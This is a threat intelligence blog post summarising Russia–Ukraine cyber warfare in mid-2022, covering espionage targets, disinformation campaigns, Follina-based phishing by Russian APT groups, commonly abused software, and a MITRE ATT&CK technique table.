Published on February 28th, 2023 📆 | 2624 Views ⚑
0Russia – Ukraine Cyber Warfare August Update
Since the military invasion of Ukraine, both Russia and Ukraine continue to conduct cyberattacks to gain information, cause disruption and create a climate of intimidation. Additionally, many threat actors and groups have announced their support of one country or the other, groups have split, and others have turned on each other due to the conflict. As tensions have escalated, Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian military actions and estimated cyber-related implications in advisories and Optiv Source Zero blog posts on February 4, February 22, February 24 and June 30. In this update, we’ll provide information on the events of the previous 30 days and what we can expect looking forward.
Destructive cyberattacks have been one part of Russia’s strategic movement through Ukraine. But as other countries come to Ukraine’s aid, Russia moves their targeting beyond Ukraine’s borders. While most of the cyberattacks targeting Ukraine were wiper attacks meant to cause disruptions and distractions that facilitated Russia’s military physically moving in, cyberattacks targeting other countries have been found to be espionage-type attacks. There have been 128 reported targets in 42 countries that represent a range of strategic espionage targets. Nearly half of the targets were government agencies and roughly 12% were within the Institutions and Organizations vertical, which include humanitarian groups providing aid to Ukraine’s civilian population and supporting refugees. The remaining victims were companies involved in critical defense or other economic support.
Figure 1: Countries outside Ukraine targeted by Russian cyber espionage since the start of the war in Ukraine (Source: Microsoft)
While most attacks have targeted NATO members, Russia’s cyber espionage attacks have targeted organizations in the United States. Additional attacks have targeted Poland, Latvia, Lithuania, Denmark, Norway, Finland and Sweden. According to Microsoft, the attacks launched by Russia against countries other than Ukraine have been successful 29% of the time. Russian APT groups have extremely sophisticated capabilities to implant code, obtain and exfiltrate sensitive information and deploy additional malware payloads.
Disinformation Campaigns
Disinformation campaigns serve to create a sense of distrust and division between allies and neighbors. Disinformation clouds the judgement and weakens the collective response of allies while the focus is on figuring out the facts. Both delays in response and division can have catastrophic consequences during a time of war. Security researchers with Google’s Threat Analysis Group (TAG) reported that in the month of June 2022, four YouTube channels and one AdSense account were terminated in relation to coordinated influence operations linked to Russia and Azerbaijan.
People around the world have turned to social media, including Facebook, Twitter, TikTok and YouTube, to stay updated on the Russia/Ukraine war. Ukrainians use these platforms to show the real effects this war is having on cities and individuals, as well as to raise money for supporting refugees and gain support from other countries. Russia uses the same platforms to obscure facts about the situation and spread disinformation and misinformation.
Several Telegram channels have been identified spreading misinformation, including on May 10, 2022, in an account claiming that Polish forces along with troops from Lithuania were planning to invade western Ukraine on May 22, 2022. Other disinformation campaigns have been attempted to undermine and divide the Western coalition, including articles posted on both Russia Today (RT) and South Front. An article from June 09, 2022, stated that Western citizens are less likely to believe in their leaders, but more likely to support their government’s decisions to place sanctions against Russia. Another article published on June 03, 2022, claimed that the U.S. government has made beating Russia in Ukraine a top priority while sacrificing the safety and needs of its citizens.
Lastly, efforts have been made to portray refugees from Ukraine in a negative light to citizens of the countries where they are fleeing. Russian news and Telegram sources, including interviews posted on June 07, 2022, included alleged Russian citizens living in Poland stating that Russians were denied employment and renting opportunities, enduring psychologic pressure from Ukrainian refugees and afraid of being attacked by them.
Figure 2: Identified memes that depict alleged German sentiment toward Ukrainian migrants. (Source: Recorded Future)
In addition to undermining and dividing the Western coalition on Ukraine, multiple disinformation campaigns have aimed at portraying Ukraine as the source of Nazism and modern-day fascist movements. This misinformation is Likely meant to reduce Western support for Ukraine and influence the public opinion of Russia in this war. On June 06, 2022, an article in Global Research, a pro-Kremlin website, stated that the U.S., who fought against Nazis in WWII, is now training and financially supporting Nazis in Ukraine.
Disinformation and misinformation can come from all types of sources, including Russian-state media organizations, pro-Russian accounts, social media, fake groups, alternative theory groups and individuals that wish to support Russia’s actions. Often times these statements and accusations are corroborated through non-verified sources or are poorly sourced in general. It’s Likely that Russian supporters will continue to spread disinformation to garner additional support for Russia and attempt to divide the Western coalition.
Continued Cyberattacks
In June 2022, the Russian government warned the U.S. and its allies that they risk a “direct military clash” if cyberattacks on its infrastructure continue. In June 2022, Russia’s Ministry of Construction, Housing and Utilities website had been hacked and defaced with the message, “Glory to Ukraine” posted on the homepage. Russia’s foreign ministry blamed threat actors in the U.S. and Ukraine for the increasing attacks on critical infrastructure and state institutions. Websites of Russia state-owned companies, such as banks, airlines and alcohol distribution portals and government agencies have been increasingly targeted in DDoS attacks. Additionally, other attacks have included espionage and wiper malware attacks.
While Russia faces increased attacks from threat actors across the world, Ukraine continues to face cyberattacks from Russia state-backed APT groups and threat actors in support of Russia’s actions. Turla, an advanced persistent threat group attributed to Russia’s Federal Security Service (FSB), was observed hosting Android apps on a domain spoofing the Ukrainian Azov, a unit of the National Guard of Ukraine. The apps were hosted on a domain controlled by the actor and disseminated via links on third-party messaging services. Turla distributed the app under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites. However, the purported “DoS” consisted of only a single GET request.
Both APT28 and Sandworm, Russian APT groups, were observed conducting campaigns exploiting the Follina vulnerability (CVE-2022-30190). One campaign conducted by Sandworm included sending phishing emails with the subject “LIST of links to interactive maps” and contained a malicious document attachment. The attackers targeted more than 500 recipients at various media organizations in Ukraine. Sandworm has been targeting Ukraine consistently over the previous 24 months and have increased significantly since the Russian invasion of Ukraine.
In July 2022, the Ukrainian Computer Emergency Response Team (CERT) warned that the Russian-based APT, APT28, was believed to be sending emails containing malicious document, named “Nuclear Terrorism A Very Real Threat.rtf”. The attackers Likely used this name to lure victims into opening the attachment, exploiting the fear Ukrainians have over a potential nuclear attack. The document attempted to exploit the Follina vulnerability to download and launch the CredoMap malware on a target’s device. CredoMap is an information stealing malware that has previously been used by APT28 against Ukrainian organizations.
Another attack by a threat actor tracked as UAC-0098 delivered phishing emails with malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine. Based on overlaps in infrastructure, tools and a unique crypter, it has been assessed with Moderate Confidence that this threat actor is a previous Initial Access Broker that worked with the Conti ransomware group. The threat actor deployed a Cobalt Strike beacon, which is frequently used to deploy ransomware against victims.
Looking forward
Along with heavy warfare and fighting in Ukraine between armies, cyberspace has become and remains a secondary battlefield between Russia and Ukraine. Additionally, Russia-based threat actors have targeted countries that are supporting Ukraine, including the EU and the U.S. It’s Likely that both countries will continue to expand their cyberattacks in an attempt to collect intelligence and disrupt operations. It is Likely that Russia cybercriminals and supporters will continue disinformation campaigns as an attempt to gain support for the war and divide the Western coalition.
Along with the physical conflict in Russia’s invasion of Ukraine, it’s Likely that cyber adversaries, regardless of attribution, will continue to leverage and employ techniques, tools and vulnerabilities used in previous cyberattacks and campaigns. Threat actors are Likely to target known vulnerabilities, including older (2+ years) vulnerabilities, in widely used software and services to gain access to victim networks. This is Likely due to the success of compromise in employing the same techniques and utilizing minimal resources by reusing open-source and commercially available tools, software and malware.
In addition to multiple vulnerabilities, it’s Likely that cybercriminals will use common software and malware in the coming months, such as:
- RDP
- SMB/Samba
- UPnP
- Oracle WebLogic
- Microsoft Exchange
- Microsoft SharePoint
- VMware vCenter, ESXi, vSphere, vAccess
- VPN clients – Pulse Secure, Fortinet Fortigate, Citrix Gateway
- Jenkins
- Content Management System (CMS) platforms
- WordPress – Joomla!, Drupal, Magento, Adobe Commerce
- Mimikatz
- AdFind
- AnyDesk
- Rclone
- Ngrok reverse proxy
- Zoho MangeEngine
- LogMeIn
- TeamViewer
Tactics and Techniques:
Tactic | Technique | Procedure |
---|---|---|
Reconnaissance | T1593 | Search Open Websites/Domains |
T1595.002 | Active Scanning: Vulnerability Scanning | |
Resource Development | T1587.003 | Digital Certificates |
T1586 | Compromise Accounts | |
T1584.005 | Compromise Infrastructure: Botnet | |
Initial Access | T1133 | External Remote Services |
T1190 | Exploit Public Facing Application | |
T1566 | Phishing | |
T1078 | Valid Accounts | |
T1199 | Trusted Relationship | |
Execution | T1072 | Software Development Tools |
T1059 | Command and Scripting Interpreter | |
T1203 | Exploitation for Client Execution | |
T1204 | User Execution | |
T1204.001 | User Execution: Malicious Link | |
T1204.002 | User Execution: Malicious File | |
Persistence | T1053 | Scheduled Task/Job |
T1098 | Account Manipulation | |
Privilege Escalation | T1611 | Escape to Host/Exploitation for Privilege Escalation |
T1078.001 | Valid Accounts: Default Accounts | |
T1078.002 | Valid Accounts: Domain Accounts | |
Defense Evasion | T1127 | Trusted Developer Utilities Proxy Execution |
T1497 | Virtualization/Sandbox Evasion | |
T1562.001 | Impair Defenses: Disable or Modify Tools | |
T1562.002 | Impair Defenses: Disable Windows Event Logging | |
T1055.001 | Process Injection: Dynamic0link Library Injection | |
Credential Access | T1212 | Exploitation for Credential Access |
T1003 | OS Credential Dumping | |
T1110 | Brute Force | |
Discovery | T1120 | Peripheral Device Discovery |
T1083 | File and Directory Discovery | |
T1135 | Network Share Discovery | |
T1518 | Software Discovery | |
Lateral Movement | T1210 | Exploitation of Remote Services |
T1570 | Lateral Tool Transfer | |
Collection | T1213 | Data from Information Repositories |
Exfiltration | T1041 | Exfiltration over C2 Channel |
Impact | T1485 | Data Destruction |
T1486 | Data Encrypted for Impact | |
T1489 | Service Stop | |
T1489.001 | Network Denial of Service – Direct Network Flood | |
T1531 | Account Access Removal |
It’s Likely that the U.S. and other Western coalition countries will remain attractive targets for Russia-based threat actors for financial gain and espionage attacks. It’s Likely that if the United States imposes harsher and broader sanctions and embargos on Russia, the fallout will result in nearly all ransomware groups being placed under severe restrictions through the U.S. Treasury’s Office of Foreign Asset Control (OFAC). This would result in the inability of ransomware victims in the U.S. to consider negotiations and payments in exchange for preventing data leaks and retrieving decryption keys for compromised files and systems.
When Russia invaded Ukraine, U.S.-based organizations began pulling their business from Russia. Multiple ransomware groups, including REvil, Conti and LockBit 2.0, are based in Russia and target multiple U.S.-based organizations daily. The sophistication and technical knowledge of the ransomware groups, the NotPetya attacks and nation-state groups – such as APT28, APT29 and Sandworm – highlight Russia’s ability to create severe disruption and chaos in the United States. U.S.-based organizations are a historically attractive target and it’s Likely that U.S. companies will continue to be targeted, whether by threat actors based in Russia or those in support of the Kremlin’s invasion of Ukraine.
References
https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE50KOK
https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/
https://blog.google/threat-analysis-group/tag-bulletin-q2-2022/
https://t.me/baltnews/14510
https://www.rt.com/russia/556770-west-anti-russia-propaganda/?utm
https://www.globalresearch.ca/us-battled-ww-ii-nazis-today-us-side-by-side-ukraine/5782550
https://southfront.org/the-u-s-governments-top-priority-now-is-to-defeat-russia-in-ukraine/
https://go.recordedfuture.com/hubfs/reports/ta-2022-0707.pdf
https://cert.gov.ua/article/339662
https://cert.gov.ua/article/341128
Gloss